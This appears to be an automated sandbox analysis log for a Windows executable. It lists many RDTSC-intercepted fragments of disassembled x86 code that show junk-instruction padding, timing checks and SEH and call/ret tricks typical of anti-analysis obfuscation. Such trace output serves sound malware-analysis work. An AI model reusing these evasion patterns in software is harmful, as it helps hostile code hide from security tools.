Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5F9BB second address: F5F9CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6AB48 second address: F6AB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6AB50 second address: F6AB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FFAAD0A8F16h 0x0000000d jp 00007FFAAD0A8F16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6AB63 second address: F6AB81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 jno 00007FFAACBEF8C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6AB81 second address: F6ABB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FFAAD0A8F27h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FFAAD0A8F26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6ABB9 second address: F6ABDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAACBEF8D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007FFAACBEF8C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B3D1 second address: F6B3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B51D second address: F6B523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B523 second address: F6B52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B52E second address: F6B532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6F18B second address: F6F1AF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAAD0A8F2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6F1AF second address: F6F1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6F1B5 second address: F6F1DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAAD0A8F16h 0x00000008 jmp 00007FFAAD0A8F1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFAAD0A8F1Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6F1DC second address: F6F1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAACBEF8CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FFAACBEF8C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F73007 second address: F73018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F73699 second address: F7369E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F71EDC second address: F71EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FFAAD0A8F16h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F71EFA second address: F71F13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78C55 second address: F78C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007FFAAD0A8F16h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFAAD0A8F23h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F34325 second address: F34329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F783DF second address: F78411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F22h 0x00000009 pop esi 0x0000000a jmp 00007FFAAD0A8F21h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FFAAD0A8F16h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78411 second address: F78420 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78981 second address: F78987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78987 second address: F7899E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jnp 00007FFAACBEF8D0h 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BFE8 second address: F7BFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C595 second address: F7C59F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FFAACBEF8C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C9C4 second address: F7C9CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C9CA second address: F7C9D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7CA23 second address: F7CA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7CF76 second address: F7CF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7DD0C second address: F7DD19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F803C9 second address: F803D3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAACBEF8CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F803D3 second address: F803E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FFAAD0A8F24h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F803E4 second address: F8046F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007FFAACBEF8CEh 0x00000010 mov dword ptr [ebp+1244E84Ch], eax 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 call 00007FFAACBEF8CEh 0x0000001e pushad 0x0000001f mov bh, 97h 0x00000021 jl 00007FFAACBEF8C6h 0x00000027 popad 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007FFAACBEF8C8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov esi, 6BB77350h 0x0000004a xchg eax, ebx 0x0000004b jmp 00007FFAACBEF8D9h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 jg 00007FFAACBEF8C6h 0x0000005a pop eax 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F81B45 second address: F81B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F82656 second address: F8265C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8265C second address: F82661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F846B8 second address: F846BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F846BE second address: F846C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F846C2 second address: F846C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F846C6 second address: F846E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFAAD0A8F1Bh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jnc 00007FFAAD0A8F16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85C1E second address: F85C37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85C37 second address: F85C3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85C3C second address: F85C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F87AD3 second address: F87B5C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAAD0A8F1Ch 0x00000008 jc 00007FFAAD0A8F16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FFAAD0A8F18h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d xor di, 439Fh 0x00000032 mov ebx, dword ptr [ebp+122D2C65h] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007FFAAD0A8F18h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov bx, CF62h 0x00000058 push 00000000h 0x0000005a cld 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FFAAD0A8F29h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F87B5C second address: F87B71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F88B10 second address: F88B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 clc 0x0000000a push 00000000h 0x0000000c sub bl, 00000078h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FFAAD0A8F18h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push esi 0x00000030 pop esi 0x00000031 jmp 00007FFAAD0A8F1Ah 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89A9C second address: F89AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89AA2 second address: F89AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89AA8 second address: F89AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89AAC second address: F89B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FFAAD0A8F18h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FFAAD0A8F18h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 push 00000000h 0x00000043 add edi, dword ptr [ebp+122D2F65h] 0x00000049 xchg eax, esi 0x0000004a je 00007FFAAD0A8F1Eh 0x00000050 push ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AB39 second address: F8AB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAACBEF8D9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85D99 second address: F85D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F86D3F second address: F86D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F88D60 second address: F88D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8ACB4 second address: F8ACBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FFAACBEF8C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F88D64 second address: F88D73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8ACBE second address: F8ACC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85E46 second address: F85E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BCF3 second address: F8BCFD instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAACBEF8CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C957 second address: F8C95B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85E4B second address: F85E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FFAACBEF8C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91A28 second address: F91A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F938D1 second address: F938D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8FB54 second address: F8FB58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F90B90 second address: F90BC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAACBEF8D8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8EBBF second address: F8EC61 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov di, bx 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007FFAAD0A8F18h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 mov eax, dword ptr [ebp+122D0449h] 0x0000003f sub dword ptr [ebp+12471493h], eax 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ebp 0x0000004a call 00007FFAAD0A8F18h 0x0000004f pop ebp 0x00000050 mov dword ptr [esp+04h], ebp 0x00000054 add dword ptr [esp+04h], 00000019h 0x0000005c inc ebp 0x0000005d push ebp 0x0000005e ret 0x0000005f pop ebp 0x00000060 ret 0x00000061 cld 0x00000062 mov ebx, dword ptr [ebp+122D2AF9h] 0x00000068 mov bl, CCh 0x0000006a nop 0x0000006b pushad 0x0000006c jmp 00007FFAAD0A8F25h 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FFAAD0A8F21h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91BB0 second address: F91BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92AC8 second address: F92AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FFAAD0A8F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8FB58 second address: F8FBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 cmc 0x0000000a pushad 0x0000000b push edi 0x0000000c mov bl, ah 0x0000000e pop esi 0x0000000f mov esi, 1BF22399h 0x00000014 popad 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FFAACBEF8C8h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 add di, 1D06h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov dword ptr [ebp+122D2444h], edi 0x00000048 mov eax, dword ptr [ebp+122D05ADh] 0x0000004e adc bx, D75Ch 0x00000053 push FFFFFFFFh 0x00000055 nop 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8EC61 second address: F8EC6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92AD2 second address: F92AE5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8EC6F second address: F8EC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8EC73 second address: F8EC79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F949DF second address: F94A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push edi 0x00000007 mov dword ptr [ebp+122D3214h], ebx 0x0000000d pop ebx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr [ebp+1244C007h], edi 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, 35B0DF8Dh 0x00000027 mov dword ptr [ebp+1244B300h], esi 0x0000002d mov eax, dword ptr [ebp+122D0AEDh] 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FFAAD0A8F18h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d sub dword ptr [ebp+12475E90h], edi 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007FFAAD0A8F18h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 0000001Ah 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f mov ebx, edi 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FFAAD0A8F23h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F94A73 second address: F94A83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F94A83 second address: F94A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9915B second address: F99160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4188B second address: F418B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F25h 0x00000007 jno 00007FFAAD0A8F1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F418B8 second address: F418C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007FFAACBEF8C6h 0x0000000f rdtsc
